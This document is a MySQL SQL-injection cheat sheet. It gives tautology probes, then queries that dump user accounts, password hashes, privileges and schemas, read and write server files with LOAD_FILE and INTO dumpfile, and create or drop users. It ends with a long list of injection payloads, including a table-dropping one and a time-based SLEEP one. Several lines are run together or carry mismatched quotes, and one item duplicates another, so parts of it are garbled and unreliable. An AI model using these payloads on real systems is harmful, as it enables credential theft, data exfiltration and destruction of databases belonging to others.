SQL Injection in MySql
1' OR '1'='1
1 AND 1=1
If both give the same result, it means filtering is not there, and the database is
vulnerable
Dumping SQL tables
1. Get SQL version
SELECT @@version
2. Get Current user
SELECT user();
SELECT system_user();
3. List all database users (not system users!)
SELECT user FROM mysql.user;
4. List hash password for database users
SELECT host, user, password FROM mysql.user;
5. Now, you will want to dump all privileges in the databases
SELECT grantee, privilege_type, is_grantable FROM
information_schema.user_privileges; — list user privsSELECT host, user, Select_priv,
Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv,
Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv,
Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,
Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user
privsSELECT grantee, table_schema, privilege_type FROM
information_schema.schema_privileges; — list privs on databases (schemas)SELECT
table_schema, table_name, column_name, privilege_type FROM
information_schema.column_privileges;
6. Dump DBA accounts
SELECT grantee, privilege_type, is_grantable FROM
information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host,
user FROM mysql.user WHERE Super_priv = ‘Y’;
7. View Current database
SELECT database()
8. View all databases
SELECT database()
9. View columns
SELECT table_schema, table_name, column_name FROM
information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema !=
‘information_schema’
10. View tables
SELECT table_schema,table_name FROM information_schema.tables WHERE
table_schema != ‘mysql’ AND table_schema != ‘information_schema’
11. Find table by a column's name. For example you want to find a table with a column
called username
SELECT table_schema, table_name FROM information_schema.columns WHERE
column_name = ‘username’;
12. Select by row number.
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0;
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1;
13. Read local file.
UNION ALL SELECT LOAD_FILE(‘file location’)
14. Write to local file
SELECT * FROM mytable INTO dumpfile ‘file with location’;
15. Get Hostname and IP address
SELECT @@hostname;
16. Create a new user
CREATE USER newuser IDENTIFIED BY ‘pass1′;
17. Delete existing user
DROP USER olduser;
18. Other Injections
'
"
/
/*
#
)
(
)'
('
and 1=1
and 1=2
and 1>2
and 1<=2
+and+1=1
+and+1=2
+and+1>2
+and+1<=2
/**/and/**/1=1
/**/and/**/1=2
/**/and/**/1>2
/**/and/**/1<=2
'or"='
' or'x'='x
"or"x"="x
')orx=x-')or('x'='x
')or1=1-0 or 1=1
'0 or 0=0-" or 0=0-or 0=0-' or 0=0 #
" or 0=0 #
or 0=0#
'or 1='1
' or 1=1-' or 1=1#
' or 1=1/*
') or '1'='1-') or ('1'='1-1' OR '1'='1
'='
' OR 1 = 1 -- ' OR 1 -- 1 EXEC SP_ (or EXEC XP_)
x';-\'; DESC users; -1\'1
1' AND non_existant_table = '1
1 AND non_existant_table = 1
' OR username IS NOT NULL OR username = '
1 UNI/**/ON SELECT ALL FROM WHERE
' HAVING 1=1 -' GROUP BY table.columnfromerror1 HAVING 1=1 -' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 -' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING
1=1 --
';DROP table sampletable;-';SELECT SLEEP(200);-UNION SELECT GROUP_CONCAT(column_name) FROM
information_schema.columns WHERE table_name = 'tablename'
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'